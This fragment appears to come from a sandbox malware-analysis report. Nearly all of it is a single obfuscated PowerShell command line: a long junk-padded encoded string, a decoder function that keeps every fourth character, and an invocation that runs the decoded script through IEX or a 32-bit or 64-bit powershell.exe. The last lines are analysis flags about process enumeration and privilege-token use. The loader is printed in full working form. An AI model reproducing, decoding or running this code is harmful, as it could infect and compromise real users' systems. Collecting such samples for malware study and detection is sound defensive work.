eff'KhaCPoiCforDBraBsteCVelAPakCStoBReaCLitCChrDhje0For9JudETav9HapAVelEForESkrDBacBEpsCLanCBrsCtraDSkrDTpp1OveDEnu0AboDSta7BehDInt8TacDPro7RoeDOprDForDGstBUncCRewCProDEnc7TegDSem0KarDGeo9udsDUniBTheCPhaCSnaDLip0ChoDOveBAdjCDjeDPri9Hae0AccFDia7dunDLos0IndCMuc8DriDUnd1ambDEnc5dufDKraBLan9Bri6Gol9AfrAGliDRef0PelCForBEnvDNov2ForDDir2Sma9Con2App9GenETarFantEDis9For6VesEFor5MedEZonDLepCMen7FarCInaDUguCArtAPriDBesBSalDBrn3mou9Mis0NonEClaCStiCKinBdouDaiw0RdnCslaASkbDGas7GenDBra3ZoaDKunBBla9Nim0NymFSty7SynDGra0NatCbetAdekDIndBDeeCBrdCVidDund1PseCParEPirEBygDEmaDMajBDieCLauCAfgCDup8WhiDSyn7PraDAnaDunmDUriBKomCCerDdec9Imb0ConFTll6chlDWatFMicDTel0DisDVelAEskDReg2ReaDSulBEksEneoCInfDFlaBNigDdad8TaiEPri3Lan9Lis6KosFDis0StuDBdeBHypCInt9Mas9Pre3UdkFPhy1EdiDFlaCPerDAna4AstDoptBAppDTopDStoCAchADgn9MulEPerEConDlsnCBra7SatCRefDDecCCryAvenDGamBcroDTho3Imb9Sla0WhiEForCSubCOmkBPotDUda0TopCIneAPelDJap7ConDung3IsoDAciBGen9tyl0fraFDia7StaDLov0UndCManAFevDSmuBDeoCRaaCAntDHet1turCProETraEHerDUfoDDmmBMacCTitCEpiCRom8KidDHet7AabDGylDKroDPrsBLsnCAntDIso9Tvr0LagFPlo6KakDTetFStoDunm0HauDOmnARinDMob2aftDSukBVimEEnpCIndDantBSalDQua8Sub9Gru6Out9Bic6BagFAra0SclDSteBSysCSam9Cel9Hel3ForFKol1ImbDKofCBeaDven4FodDBloBIrrDPrvDEksCGaeAMor9SulEJuaFmur7BrnDRdn0ForCSwiAVieEPreEGalCSysAFisCErnCHav9Pho7Psy9Uko2Non9SmaEGow9Sup6Rep9PenAFreDHor8IntDTynFDesDOpe2CagDConARhoCCatDPolCSkiAPanDAntFNauDGrn3texDOpu3ChrDTyrBKnuCZooCSpeDQua0PanDVanBDraCBlgDove9Fag0IniFUnt9SanDNivBTopCBreASorFSki3BriDHorBRusCaccALodDAar6MouDUnf1XylDSwaAEft9Bio6Ant9naiASprEJupETelDSti2AlfDAlgBZeaDKul0IntCTraBChiDUnr3KanDUdgAFinDDia7SkaCNaiDSubDImp5SonCSamBSynCEmiDBhaCUngDKryDout7KinDEpi1RecDAti0husDTelBBesCNatCBibCCouDEft8FulBEge9Fla7lei9Cou7cru9Ale0StrFPre7FelDHaf0ForCTra8BenDTri1NedDSta5TalDfemBAge9Lop6Epe9KruAExtDKat0CogCAckBFdsDRee2ZafDAca2Par9Til2Par9VacEBerFLonENar9Run6Pig9HovAPanFHjeDUndDRem2BreDMil1InvDMerAMutCUlvEMitDpas1OveDTvi2repDKkk2Una9Gra7Dia9Bog7For9Sta7Skv9ble7Dyk9Eff2Arb9BlsEKid9LitAborEUndDSurDEnsBNonDBru2BarCAnt8KlaDSpn8YndDEli1strCVanCStyCFluDDivCklo7WheDTox0pljDAfeBKirDDen0EleDBenAHaeDParBoutCBumDUnt9Pan7Cho9Sko7Ste'Fra;Sci.Bol<ChaAManpSoloSkigRevaStalsloaparcGagtSkaeTaruSkemskr7Ove Ren<sniCBasoSilnRusbSttiGennEmiaNivsUds1Con;Omn}StefstouNybnWaicSymtPoriKrioantnOve LepSFortRowaElemHelbFoueUndsStatErknKoniKemnDypgDef2Anb3Dig Sta{SorPSubaIndrassaSmimSlu Esk(Twi[SpiPSmdaSnorSteaFodmBideVegtNuaeFatrSyv(SauPbehoRefsValiTittBepiPhloSelnRoo Iag=Thi Epi0Sne)Rep]Mer toe[PriTDusyGaspCoceTrs[Con]Hen]Und Fer<SkaAUnsgRooaAcelNigaFakcPoctBriiForaSna,Bou[TypPRetaUmbrTupaMatmGreeUnitDubeRudrBan(BunPVejoProsMasiScrtcoriCocoBounTuy Amb=Vul Wee1Sto)Dem]Arh Sei[EpiTnonyAnspUnfeLeg]Bnh Ven<KoonSkaaPhttnabiDiloSelnCopadotlJomiPtesSkapcitbafsrBau Sen=Spi Rei[conVUntoJuliAfsdBri]Bom)Sil;Com<denCIntoPhynschbEpoiAfgnkogaBrasSta2Ste Ops=Cat covSmontUdvaZiomArbbFaseDebsDectIngnDeciNatnGorgBla0tha Unq'gym9IntAForEForCHymDTinBhusDVllARecDHan7ParDUnt8PunDAci8RepDDyrBBilCRemCTydDReeBBusDCin0UdkDFanDPhlDIatBLazCensCUnb9SamECes8rem3Vri9MaaEDisEunf5AceFTraFSyrCAcaEavlCgruEHonFVriATrsDMit1BakDAmp3GrnDAgaFWjcDUna7SkjDFra0SigERev3Arc8Eks4Ero8Eja4SanFMetDMddCMirBPesCFraCAvlCSplCKliDSkaBPapDRaa0AddCemmAHarFTerAAbiDNom1OveDMil3DiaDRhaFUdbDMoe7OveDFij0Fil9Ter0VeaFNonAFosDHufBHjhDFli8RevDDum7UnmDOpm0LogDSteBHarFCemAiliCAfs7SalDdes0SekDAfkFPlaDDar3SemDSub7GruDDekDEddFAalFTetCGenDSprCSamDIndDRatBTanDEft3DekDHarCChiDSve2AusCOma7Unr9Leu6moi9Sty6KonFUnd0SeqDFanBfreCMon9Juv9cow3KalFSta1MalDBitCNytDNse4StaDStrBCopDYngDAreCIncAAli9RrkEnonEBusDClaCReh7FilCFjeDJenCparAWooDDanBTilDFas3Tyl9Ado0MexECybCBaeDEchBBesDFor8WebDGym2nonDSndBDatDBanDPasCTanAUmrDHoa7BerDDag1MomDBra0Fic9Hot0MucFWooFBibCBocDOstCTroDMytDAppBGraDPsy3LurDCatCYppDVer2AdhCKab7SkoFDam0OttDSunFCatDKnu3KonDForBSta9Kik6Cer9DraAHovEBelEPerDPre2MonDUngBPotDArb0RriCAvaBRacDBes3BarDChaAPalDSta7MadCLgkDSneDDum5MogCIneBFabCPhyDLaaCForDAfrDSlo7ArbDDif1CocDJar0ColDMarBDifCSpoCCalCExcDIna8Den6sor9Car7Ree9run7Sta9Vul2Ord9SkiEPiqEYap5RkkEDupDAnpCJag7SneCAfdDMorCPatAenwDUmbBVinDBag3Ara9Omb0NegEFalCSolDManBUdbDtem8OveDOpk2AorDDogBNedDSojDCloCTinARosDSla7WirDPan1StrDArt0Plu9Anf0PreFCurBEgeDLot3HabDKon7BulCStaAFac9Srh0EchFTodFHarCAndDFjeCJobDNavDchaBRumDPle3AnvDadoCUndDJee2BekCBlg7GasFexpCRedCmanBRepDFam7ForDmet2HorDHeoAManDskiBProCUntCBetFKomFplaDPosDDroDMonDTroDBovBAllCOxaDVolCConDVinEUns3Oli8Kat4Dal8Wes4SplEDigCSamCUngBMesDAge0Vrt9Tem7per9Cal0repFHenADemDTerBApoDLiv8OkkDNep7DicDGeh0slaDNeeBAnsFMinABebCTil7ArgDTit0TinDTraFYngDUnr3UniDVet7DecDStrDHulFDis3Ky DTab1SulDSkrASemCSerBAcrDLed2SifDSclBLan9Typ6Gas9shrAUroEUnsEVesDCyk2OpdDPreBzeiDste0BorCKonBKarDEmp3KluDSalABorDJou7BanCSprDTirDTyt5RygCeleBNonCSpoDUdsCHotDLynDSmr7SprDEff1ShrDTou0luzDGinBsnaCUnkCBatCAngDSek8Cir7Udt9Amu2Hin9SloEMoi9wriAUniDTru8LugDUngFLomDFor2FooCNyaDClaDAngBPer9Isk7Try9Tod0SnkFHydAHemDRefBFolDNon8FjeDOve7ConDRad0tulDDiaBKorEOppAHelCInd7hisCRorEProDSpeBAll9Man6Bla9SelASubFWagFMagCMicEFanDBro1NeoDSto9FodDBenFdaaDJor2GolDSubFMelDForDForCDotAInfDMisBFakCGalBLatDBan3Sto8LagESti9Urm2Unl9EjeEAgi9MdeAPosFAbbFYamCIleEExpDRil1SpiDtob9SubDfalFDetDBro2MonDUinFHolDFinDPubCJazASteDBodBRanCRecBTraDArb3Ser8DanFWra9Sta2Kon9OffEnutEBro5MolESkoDHumCDem7AccCSniDKurCTilAMrkDBefBuslDSem3Idx9Tra0bzeFHju3ModCIsoBFilDDgn2VmmCAlaAVikDImd7MyrDSkaDFriDRetFEgyCValDSteCAdjABayFinkAAttDComBconDFyl2FjoDStiBUnpDOff9AccDOveFAnvCFlaATvtDBevBMenECom3Zac9Ove7Wav'Ult;Mut.Fej<semAFinpferoSapgundaLowlBetaHovcArctbukedisuChrmDag7Fil Sju<SteCSupoKirnOvebUneiRoenStjaSemsHre2Bar;Fre<SalCIlgoIdinBolbEleiIntnTraaTitsBro3May Lag=Ber FloSMustLavaWismRebbSkueudssKnatNeunIntiWeanSungDem0int Pru'Pla9hicADoeESilCKriDNonBChaDPaaATakDUnd7KasDBol8OveDImp8PadDHygBDdsCHaaCForDDiaBHeiDree0SveDUndDThaDOveBActCLarCBis9Ent0PhaFPaaAHorDgraBUnrDSwe8KnoDAcr7BenDVer0RekDFasBAtoFMajDcapDAdv1SomDFor0HomCbaaDPigCUbeAMayCSkrCIndCTelBbatDKraDEsbCUsaAAfsDFos1AlaCAlrCInd9ska6Fry9SymACytEDomEDukDGra2HanDFarBStoDPol0ideCResBParDArm3bohDPatAEleDDeg7DucCRetDObeDCha5VarCCogBMooCFlnDInfCTevDgriDBlg7RdhDAsp1SprDSoy0SynDFejBFalCStaCRefCGraDHec8Hac8Ker9Fdr2Sta9SimETanEMyl5AfkEBatDSalCTre7FhoCGteDParCTurAUdkDStiBHepDCal3pax9Esc0speEUndCUdtDPlaBSocDSja8KokDBil2PasDHetBSpeDkonDRokCPopASulDsup7UdvDRyk1TenDBou0Ler9rov0SubFPreDAarDOrdFConDSpa2MonDAut2JobDKam7NonDTok0LinDkor9FilFNapDSpaDSkl1TelDOve0OctCret8ThoDColBLagDBal0OveCFagAAssDTil7AfbDUdb1MulDDip0UniCAgeDShaEDis3Kap8Opa4Pro8Tip4AnlESucDExpCOveAHjeDSnfFForDPal0PrmDFrnAHayDSimFbadCHolCRulDTenASve9Rum2Upl9MesEPli9rrfAEgeFHaaFObsDLum9CenDOptFFlaDMok2SpoDmanFAdmDsacDrefCVitASubDNet7PirDVolFFri9Dip7Ant9Int0BloELysDDekDThrBExeCLotAHenFVid7SubDBar3FriCIntEAmaDPar2MagDAmiBSkeDunp3CorDFilBAutDMuz0TreCPixAWatDAniFInfCFloAKarDHed7hedDPhe1DanDHal0PecFuge8TraDMil2lokDEnhFBarDPse9OveCStyDBra9Aer6hje9GleAForESkaEForDSja2TraDAffBForDIns0SejCBaaBOrfDRun3GudDAboAFulDPin7WitCTerDStuDRet5UdeCForBTomCHisDAtlCSadDSucDuti7DyrDSpi1PriDBoa0PraDMilBConCTooCdomCCopDMar8Ber9med9Ref7Spu'Bra;Non.Per<IntASlapArooBucgsloaBedlResaplacBudtCoueKafuDromSyn7Sno Smi<HulCDisoStonSkubKviiPosnPseaConsArg3Ush;Ska<TroCWouoRelnindbKaliRefnFraaSrgsAnr4Fra Dis=Pas IndSDybtEstaHelmBigbOmoeBresSnitUrinSamiComnSubgUnw0Eks Fug'Sid9DisASofEPosCMutDDobBBorDValAVanDFle7folDMal8IntDSta8SklDBusBPriCSpkCInvDSkrBIffDTro0RehDAspDDirDSteBRadCBloCRaa9Tie0EspFBumAOpsDWebBUdtDPro8SkeDBom7UnbDNea0KnhDPorBUngFEng3KitDDegBGraCUdgAaudDZen6BerDPro1SptDIncAmed9Ide6Lov9OrtASyvFDozFAggCTzaEFonDGer1MetDoph9AguDTraFAfsDAut2AntDAfpFDoeDSaeDSamCTllACarDSkaBArcCSpnBSalDPhe3dol8intCFor9Hjr2Atr9UncESab9AktAFecFRetFWatCFyrEscuDCur1AsaDPri9AgrDRosFSeeDPar2TraDDerFBerDEleDSplCHaaAEmnDSorBLgtCdkfBDenDKun3Hal8InhDKih9lde2Fol9BebEMos9inaABloDSmo0LavDChoFForCStaAIntDSco7OraDlev1hipDbud0TolDFloFjokDTid2HanDSan7GerCBruDDomCFllESwiDHydCHenCKerCBed9Bea2Mid9RumESca9MisAchaFSubFagaDThy9hipDLurFSttDHon2bisDConFProDGidDAnaCSocASvaDMot7palDHayFPeg9Ild7For9Gre0BerEPaaDForDVseBBauCYdmABacFAnt7PerDOgi3SweCTerETilDRke2ForDPhyBBygDDol3SkaDlanBhesDCam0CirCSikAFrsDundFFugCResANonDStr7ArvDRag1PorDUnp0EicFFly8HjkDVal2HarDAzoFChiDTow9BroCEmeDAut9Ove6kar9PunATibEBedERegDGas2SpaDGraBReeDVid0nrbCAmbBSubDSho3GraDTubAForDVel7MonCTopDExcDcor5ForCFagBKonCRecDDruCUdsDEksDTit7CreDLag1BegDRet0SnaDCamBDryCTemCArcCRacDHov8Skn9Klo9Kam7Fra'Fus;Man.Und<PulARetpAffoMacggioaBerlvidablocPertDigedanuSpamInd7Sta Bre<supCPiaoRutnSembEupiIntnUndaudsskal4For;Kas<ScrCTiloSkvnSydbDisiJounPeraBrosSvo5Pat For=red EnkSBlatSanavinmPosbdereTjrsDretMennBiliChanUnfgSch0Ran Byd'PolCforCHemDVinBVocCPomATyrCFroBDybCslkCDybDWeb0Unv9RivETel9VapAanlEArdCMumDProBParDTeaACypDNev7TilDfor8theDUns8SelDMagBRinCVolCMinDcenBRefDHea0TohDPasDEndDReeBdosCRecCKon9Lsa0ImpFStrDErhCTyrCKalDGveBDecDSalFStuCForAProDColBInjEUneAThiCMic7BloCGruEKriDHavBBla9Fit6For9Sma7Ret'Roe;kob.Sep<CatAAutpStroTorgNedaDanlExpaBlocSamtCaseConuHipmTnd7Pal peb<FisCAstoDomnRidbDesiHaanWicaMolsFst5Mea Anl Rav Gik;stu}Dri<LimBOceoRaioVenmAer Bib=Obj nglSGastRygaDirmKunbKomeForsKadtTeunPreiSernMaagSkr0Ple Acq'ShoDKni5VenDStaBNewCKenCAmfDDar0PreDlibBLunDInc2Ple8GarDGen8ResCunh'Sur;Req<QuoCGouoCounLsebThiiKvanJunaSkrsGau6Fak Fli=For VreSThetBamaNonmMusbNonechasEnttModnDugiInsnPrigRov0Sol Afk'Sji9DdsAUnbFVap0MegDMalFRegCBon8UnnDVed7VerDProDHejDBlnBJemCAchCIngCUndAJemCEmbDBas9UndECen8Cym3Int9FlyEMarESer5LndEIntDJugCRet7FikCPreDSvaCUdpAPreDKonBnonDEgo3Cha9Cha0BdsESteCAffCmonBEurDAgg0SpoCMlkAStoDBad7DimDBur3ColDomnBKor9Did0PorFfor7AgrDCyp0SulCMisATomDIndBForCsklCGajDByg1SupCpusEDehESilDForDSepBCelCExtCUnsCFor8BygDMja7PorDKalDInsDLizBKanChemDAxe9For0UnwFFla3NeoDOliFMorCEmpCUndCQueDJohDSub6InsDHanFRefDPig2FasESpo3des8Imp4Tes8Fis4SnyFSan9BarDaddBPaiCKalAFisFTriACopDHomBShiDSva2OxyDBapBKomDGru9MilDBurFCasCFynALapDForBMylFSan8RusDBan1choCAfrCEngFIng8NikCPalBFriDGra0UndDimmDuncCSupAScaDTud7BraDRim1stiDSax0SkoEPhyEJusDBre1SkaDGyp7RetDRed0GrnCCatAVinDBotBNeoCTalCUns9Adi6Sel9sca6balEWhoDImmCDigASanDTakFBegDsot3FriDLinCLseDUnsBFibCMerDIndCBanAFimDInd0KaaDSco7YouDFys0PlaDSea9Sch8PanCArb8NarCPro9EjeEAff9SvmADroFsteCKliDHjl1BetDUna1RipDNgs3Cap9UnsEOpg9UnvAMamFBetFAldCIsbEBioDPro1LgeDSol9culDFulFNonDano2PerDOutFswiDFemDdefCHunAFleDBonBKnaCperBEvaDInt3Cas8NooAHan9Tus7Non9Els2Tru9SexEHav9Emi6AreEFosDkalCPriAbilDSkuFProDmac3KloDScaCKraDPj BResCOveDComCSynAChiDNit0EarDPri7SadDMis0CouDTil9Und8CloCTry8TuyDUnc9AalEModFMarEPot9Des6halESub5FisFDou7MinDfas0sljCstyASlaESteEKarCTflADetCWatCBygESik3Dep9Hns2Fem9ParESnoEFri5SkrEbedBAnrFEud7PorDDig0antCSpiAUnw8PenDSou8StrCMamESil3Unc9Sad2Oli9romEUncEPro5MaeEBjrBbesFudy7wamDSmu0EntCConAral8NorDEsp8UdjCTilEFal3Ove9Tal2Int9AviEworESpa5UndETraBEksFTil7TroDPos0AppCStrASle8bogDPre8DtrCNorEeks3Bru9Bla7Sar9ShoEStj9Mut6DulEHen5intFDgn7PyrDMin0LavCGruAImmEAfbESmiCLanAForCHunCSpaEMel3Tun9Car7Cur9Par7God9Gar7Lek'Tra;tor.Kai<ovuAPropPenoPyngDreaEkslProaSkjcTimtauteSapuSkemSys7Mis Ser<SmaCMesoSupnTerbHypiBymnSkaaStesSld6For;Tri<IndRAxoeInsgBaaeSkrnEmpeTalrspreAnlrBeheToi Par=Imp DiaSTittAnkaPiemRegbPereClasUdstEqunIndiAnnnMengWoo2Abe2Aae Che<PytADiapDifoMedgBagaSenlbaaaGalcOlitAutetoauPedmRos5Fra Mis<GulALappSmioShagIldaReclSabaSamcBantUdreDopuHalmLar6Mun;Hef<OrkCUncofornNesbSnuiPennKomaSiksCan7Wea Lit=Tou IjeSNettMesaByrmFolbStreSpesKvitHafnGutimennIbrgomb0Ref Bol'Hyd9GenADioFrul6calDBag0PegCParDPirDkomBTwoCKlyAsveDaceFBioCHaaCFrgDLiz3Pej8BesDVis9MelEBaa8Que3Bac9GnaEAme9SalABliFass0GenDKisFSprCCel8KebDByg7BrlDDemDproDFriBGenCHumCDisCAdvAHegCAmaDTri9Slu0UnlFpru7RhyDQui0ElvCReg8IndDShe1DisDEpi5RoaDSpiBSko9Den6FlyECha5IrrFDoo7KkkDAfk0LreCBrnAEpiEgruETesCMonAWooCOutCOstEBit3epi8Tra4Sig8Fre4IncERus4UncDUluBKlaCFarCHjlDAfd1Cal9Ero2Hum9NitEpyr8Uny8Cob8FanBKnh8ReaBAmi9Alf2Sto9LlaESja8ConENetCFor6non8retDPsy8TanECup8PenEHyd8MacErep9ven2Hig9TraERds8LilESekCSki6Opr8DetAPor8humEEnd9Air7unr'Fop;Bil.Pre<EliADespSpeoAttgMarachilSteaSibcGentBogeHveuScrmSel7Pre Ant<MidCSidoCoonMisbPruiMaanSeaaNatsOve7Mas;Sig<SkrCSigoPernAccbPhoiLngnConaSprsden8Tho Gia=Puf SekSDektUniaBanmridbIndeTapsUdttHaanLsiiAnanUdvgGra0Dis ick'Buc9FryAnavFBor2SubCAur7TovDCom0ReeDGraBSigCRegASpeCafvAUncDDenBskiDFan0HleCKorDFor9BanEAna8Lem3Lau9BucETom9RasAAppFTep0apsDUniFForCBes8GenDCha7MugDHysDnonDNacBPyrCMadCBenCrumAIntCAgeDStr9Rai0UbeFMil7UdvDBut0GriCIod8LavDUde1SmuDOne5MilDArbBLoc9uko6MarEOph5FraFDam7DauDJon0SkaCSamAUnpEVerEEndCRnkAlatCAddCOksEVin3Dec8Sla4Cos8Hex4TraEWha4donDSanBUnrCFreCLetDPne1Out9Fll2Sva9ForEkla8ThoCDam8PitFTek8FstCSka8LgdDTje8For9Hij8War9Sko8Cir8Spr8MotEUnb9Pre2Unn9azuEesp8TabEBelCKle6Kam8GruDBol8PugESka8BurEant8CleETow9Khu2Qua9BieEAfl8IrrEsmaCUnj6Non8nonAVar9Cir7Dri'Ind;Svi.Pic<BygAIndptrsoHjlgfisaMaslKiraCoecMistTyleJoruSmpmBur7Idi Win<BenCDdboLatnSlibMilisynnzonaOrnsAnn8Rv ;Arb<SygSGujuDenfSocfTa rDisuFiltOveeVocsKolchanebrlnanttKre=pri(MidGPufeSmptAln-StyIMentEvaeTyvmVirPChirBrdoEctpLeaeKlirLretFrsyInf Agi-RegPSkoaWartRhihLay Ser'LinHKatKSacCSupUBra:Rig\GouCIndaIntnSinoPeenAmmiHowzUnpeGadrBef2Bun2Pre2Tva\HigcApirMikoThrsSlvsNavcUdvuAugrAgnrUnmeGalnInttTaneOxydFol'Vil)Cor.CenSUnarouttBesrSeryMavkUerkKaseTalnsojeFil3Tuf0Jew;Lan<CryCForoZymnVikbShaiPutnForadrasPre9Bac Sol=Ber BunSGritEksaPromBevbReseIhjsouttRepnTreiColnNeugCap0God Lrl'Agt9KreAVesFElaDSniDDis1EquDDai0GemDAfgCMyoDKon7VvnDSto0OpaDCloFHugCLegDHve9UndEDet8str3Int9RekETetERek5BerEBegDSknCUdt7GenCSpdDReoCRykAfefDFemBOveDSte3Spe9Rep0KvlFThaDForDgrs1GloDGem0KvoCImm8OveDSlyBBorCStiCAltCEffASamEPru3Opb8Ewe4Per8Afs4CubFSib8VrkCUnfCItaDCry1fliDDom3UnkFAllCGruDDatFVekCsubDSkaDBumBIta8sty8Dis8CemAsmeENiaDSnuCNonAspoCOpnCVilDGen7FraDEpo0trbDSvi9Alk9Isl6Pic9BelAmonETroDhulCreeBIndDOrc8PyrDDes8BroCTnkCLogCSulBKolCSmaArecDEryBMisCrecDIndDVarDUnfDOppBUphDTet0InaCCalATam9Mar7ver'Paa;Inc.Hul<MtaAAorpAnhoporgBedaDomlFogaKopcSkitWobeLepuAbsmNon7Cir con<cryCHonoDadnHovbOveiUgunOxiaTepsPay9Aag;Fri<FanSInauMonfgryfClurSchuJodtPaaeGensZefcUndeKitnSkrtDir0Svu Und=Dag SilSOphtDynaDesmHerbLyseHadsPertDinnDiviHovnTaggPri0Kaj Enc'AdrEPil5NonEUngDPlaCPhi7UbeCTanDComCSamAStrDTroBDriDCaa3boo9Ser0BloENonCBlaCInvBLumDAri0NicCFdnAStrDsta7DanDTri3StaDredBSpr9Bal0OrpFVar7DatDFun0FilCBelAStaDSupBKorCAutCTanDOze1SnyCmenETraEpreDIndDAutBIdlCExpCHomCWau8satDExp7MrkDEmoDStrDGstBtylCDefDDek9Fid0TerFBra3deoDRdvFBirCMurCDisCAnsDAnsDRho6AnkDgulFTalDCib2CheEupr3Spo8reh4Tor8Met4cysFPatDTapDSto1ImpCBycEBekCPap7Met9Ste6Arr9AdiATkkFSakDGodDAns1ProDGyp0FibDBobCAnaDKng7AflDCri0JacDVivFForCUnfDGri9Off2Ogg9EksECon8UdkEUna9Bil2Vad9KngEKrn9AppEFag9ForADraFSam6CirDReg0ObdCWicDFloDTilBRieCDizAJanDSkrFSkoCPoiCVarDMet3Fil8SkaDKaj9Sun2Omn9TheELyc8Fla8Fro8FlaBDaa8UduBUre9ust7scy'Del;Sku.And<FifAOutpEraoKargReaaStrlLagaVancNontSupeProuPelmCox7Val Pen<kolSUmbuslifHoufElprUncuUnitAngeFacsIndcSkreBygnEletIng0Che;Vid<LatTForwCroiFortChecSerhdoseSnitFstySne=Ska<FreCamaoAmanribbGlaiVennDauaKonsFor.ForcNatoSymuStynAdmtTon-Anc6For5Bar5Tov;Une<FeeSChauTryffokfWhirEleuEsktKonefllsAnacFraeIdenSprtMen1Tre Api=Non SpiSHeptFaraAllmRusbfileWobsbaltMetnEssiShonBingFds0ytt Shi'NonEMer5UnlEStaDSmaCExc7EndCTheDEftCBunATriDfakBEliDUle3Kab9Brn0QuaEScaCLatCAfkBStoDCou0HetCKorACirDInc7DebDHel3ChaDChaBBis9Svv0NonFOma7PreDGru0tudCFliASemDCarBImpCAlhCarbDFer1PreCTraERocESteDSteDBefBRefCstaCMelCMej8ImiDGas7GriDLysDApoDKosBHooCCatDWha9For0UnjFKor3TorDPotFSavCSnoCPatCBloDCupDBro6SemDKunFDecDFul2CarENar3Rat8Lev4Vid8Mai4NarFNonDPhaDUdd1EftCAmmECahCRec7Cou9Dod6Mel9holAEleFTraDVagDTun1CerDSta0RekDTonCCalDMet7BesDple0cirDForFCepCVerDJan9Bet2Car9EllESva8Bru8Vrk8TriBCou8AttBCyc9Und2Tur9AutEsha9FlyASnrFGra2IsfCCan7BenDFde0BrnDAbsBReaCReeAStaCBraABekDLegBGulDopv0LonCChiDSha9Xan2Ref9SavEFor9EftAEscEkroAExcCPre9GloDWar7SteCSclAKasDPriDsnyDSge6BesDTraBvoiCParABloCShi7Ino9Rad7Sus'Rec;opd.The<NapADropDenoArbgOveaBlalforaRuncBeltGeneEphuCrymInv7Slo Swi<ResSGonuFutfMinfminrmisusiltVoleFolsNoncSyneOdinPactMar1byg;Whi<SinSOrsuUnofHabfMolrLoguunstdimeSmusColcEkseOvenBjetCau2Tub Tel=Ple SpoSCretAfraCenmAllbFoteBipsPrstsagnTopiCuenProgunw0Cup Ors'Eks9SkaAInfFInt8AutDKlo2SonDEct7TraDHus0GloCVejADrmDSilCPraCRelDBekCLusDStoDKniBRacDUge0Cap9lukEHyd8Hum3Arb9PerEcanEdec5WalENonDMatCBry7PolCPanDDokCBumAIbeDRubBFilDEpe3Pre9Mac0OpkERatCFatCBrsBPetDAni0IneCSkiAVesDTra7RonDVik3KatDSteBrav9Des0FedFRev7PleDHyg0OplCFarABefDFadBParCDisCWhiDFyl1TidCSigEStrEKonDBroDChaBCapCudsCVapCTol8PocDLyk7UndDRegDAbeDSchBDiaCStaDDev9Udm0GueFSut3StaDSanFBetCBhuCSorCUnbDhvdDMar6GroDRocFIndDdep2RefEbac3Lov8Fre4Rum8Tel4WanFSin9AppDSmaBRveCAlcAHotFKorARisDBanBAgaDSys2PomDResBUndDGit9EnvDGenFBrnCJavAKryDAmaBEleFCau8GraDSub1ArtCAfmCSamFPar8disCMokBKosDMis0TetDCamDSndCBilASalDAir7AnnDAss1ForDAlo0omrEHjmECanDNet1KamDFgt7TilDSel0SamCEthAImmDsloBPolCMalCExi9Cac6Der9Ers6VulEAarDRooCsdsASkiDEasFMirDWer3UfoDPelCUndDCenBKnuCflyDNonCHigAMinDPla0TreDVan7conDSto0GroDSek9Non8BroCMal8VinCAss9GadEShr9ChaAGluEMunAGorCfngCArlDPre1ExtDRepBRorDMir0HasDOveAAndDDepBFriCKraDBib9SpdENvn9NorATraDpluBFolDFav2indDKom8maiCAddCdegDTro7KapDTilBvisDKarAIndDKryFUdbCInkDExc9Gay7For9Sku2Com9RanEAfs9Fri6SviEHelDCheCNerASkaDPatFNddDReg3UmbDOveCGemDBalBgagCReaDSolCVolABriDBry0tekDInd7HyaDtrv0AldDStr9Mon8AnlCOph8ImpDkom9BruEHreFGouEVen9hal6pieESub5HaaFDif7verDQui0NonCBreAAffEGadEVidCProASamCGenCAcaEung3Vid9Til2Sni9DusESloEReb5SmaFCha7FreDAbe0HygCInvAIntEassEBilCDisAIndCRicCProERib3Cip9Und2Pil9ConEAgrEStu5ForFBlu7UncDNon0DenCMenASerEbasEMotCSemAUtaCEncCHegEInt3Tax9Lan2Mai9RecEhagEVar5ChaFDah7CycDPre0BlgCbesABorEDepESurCTopALitCOpkCBolECad3Bas9Non2Str9OksEOutEBos5FloFLag7FlyDnek0KapCBenArepEPlaEBetCHarAFrsCEulCAusEAfs3Frs9Dob7Som9WinESoc9Aan6CreESli5AtoFBog7CoeDSpe0FlaCSteAInhEbonENavCMonAsviCVigCAfrELge3Sta9Slo7Yap9Oml7Inv9Kat7Pse'Sel;Jac&Rge(Int<GulAPlaprisoRocgDomaTillSpoaOutcTistTydeBituMunmRac7unc)Ran Udk<DanSOkkuSurfOvefBanrlapuAhwtOblePatsPepcPeteetvnPretSom2Slm;Gte<HolSNonuNimfPrefXylrGayuDratklueClisReocPreecounUndtFrd3for Com=Jak KalSKartGulaDewmUmubInteDemsmaltAgenPoliAkrnurogFor0Hjh ref'Une9OveACruFKer8DeaDLnk2DitDSyn7GadDIns0eftCMarARetDRaaCOmsCHocDUffCEylDBesDFruBIrrDTra0Paa9cit0OsiFBej7BenDVib0HelCOpp8FemDAfs1SkeDJow5FreDThyBSam9Int6Mil9AneADepFinw6SauDBeh0preCArcDoutDKerBIndCPigAManDImmFOnoCStrCPatDOpv3Pja8BagDOst9Sel2Com9AppAPasFLie2InfCHyd7EncDCry0SubDHaaBmycCSubAEntCMaeATyvDChaBInsDJul0squCLidDPri9Aug2Dis9molAForESaiCSerDSplBSupDNeu9ClaDBicBIntDAff0NonDSvaBKonCBefCTooDSwaBHexCBoyCCorDKikBmis9Too2Sik8TaxEPap9Pja2Mas8SmaEHov9kn 7Reg'Nip;Dra&Til(Fan<BraALyrpFyroRoggShoaStelCaraJagcSentNoneTeluulymCol7Gab)Vrv Dre<SleSUdsustrfIntftryrHabuLastalmeGirsGuicRygeBugnFlutKre3Ser#Tre;""";Function Suffrutescent9 { param([String]$Manumitting); For($betjentformndene=3; $betjentformndene -lt $Manumitting.Length-1; $betjentformndene+=(3+1)){ $Sighters='subs'+'tring'; $Stambestning = $Stambestning + $Manumitting.$Sighters.Invoke($betjentformndene, 1); } $Stambestning;}$Transitively0 = Suffrutescent9 'DevIJunEunfXAra ';$Transitively1= Suffrutescent9 $trffetid;$Transitively1=$Transitively1.replace('<','$');$Transitively1=$Transitively1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Transitively1 ;}else{ & ($Transitively0) $Transitively1;}"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
